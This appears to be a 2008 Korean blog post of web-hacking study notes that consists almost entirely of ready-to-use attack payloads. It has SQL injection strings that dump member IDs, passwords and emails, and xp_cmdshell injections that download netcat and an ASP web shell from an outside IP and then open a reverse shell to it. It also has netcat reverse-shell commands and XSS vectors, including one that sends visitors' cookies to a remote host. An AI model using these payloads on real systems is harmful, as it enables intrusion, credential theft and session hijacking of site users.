본문 바로가기
Study/Computer&Network

web hacking appendix #1

by 사라진루팡 2008. 5. 21.

' union select convert(int, m_id),1,1,1,1,1,1,1 from member_info--

' union select convert(int,m_pwd+ ' yaho'),1,1,1,1,1,1,1 from member_info where m_id='adam'--

' union select convert(int,m_email+ ' yaho'),1,1,1,1,1,1,1 from member_info where m_id='adam'--

' union select convert(int,min(m_id)),1,1,1,1,1,1,1 from member_info where m_id>'adam'--

' union select convert(int,m_pwd+ ' yaho'),1,1,1,1,1,1,1 from member_info where m_id='admin'--

' union select convert(int,min(m_id)),1,1,1,1,1,1,1 from member_info where m_id like '%test%'--

' union all select m_id,m_pwd from member_info where 1=1--

--------------------------------------------------------------------------------------------------

command : client

nc.exe -lvp 80


command : server
nc.exe -e cmd.exe ip_adrress port

-------------------------------------------------------------------------------------------------

---------
-----------
--------- (lesson 2)
## server

';exec master..xp_cmdshell 'ping 152.99.68.181';--


';exec master..xp_cmdshell 'tftp 152.99.68.181 get nc_num14.exe c:\nc_num14.exe';--

';exec master..xp_cmdshell 'tftp 152.99.68.181 get cmd_new_num14.asp c:\inetpub\wwwroot\bad\cmd_new_num14.asp';--

';exec master..xp_cmdshell 'c:\nc_num14.exe -e cmd.exe 152.99.68.181 80';--

c:\inetpub\wwwroot\bad\download\data
-----------------------------------------------------------------

## client

windump(tool) -i 2 -n icmp

------------------------------------------------------------------
XSS 취약점

ex1) using image
<img src="javascript:alert(document.cookie)">
-----------------------------------------------------------------
ex2) using link
<a href="javascript:alert(document.cookie);">XSS</a>
-------------------------------------------------------------
ex3) using mouseover
<div onmouseover="javascript:alert
(document.cookie);"><H1>XSS</div>
----------------------------------------------------------
ex4) using ASCII carriage returns
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

----------
ex5) using VB script
<IMG SRC='vbscript:msgbox("XSS")'>
---------------------------------------
ex6) Downlevel-Hidden block
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
-------------------------------------------

<XSS code>
<img src="javascript:document.location='http://152.99.68.194/XSS/gc.m4n0f?u='+document.URL+'&c='+document.cookie+'&r='+document.referrer">test</img>

관련글

댓글

티스토리툴바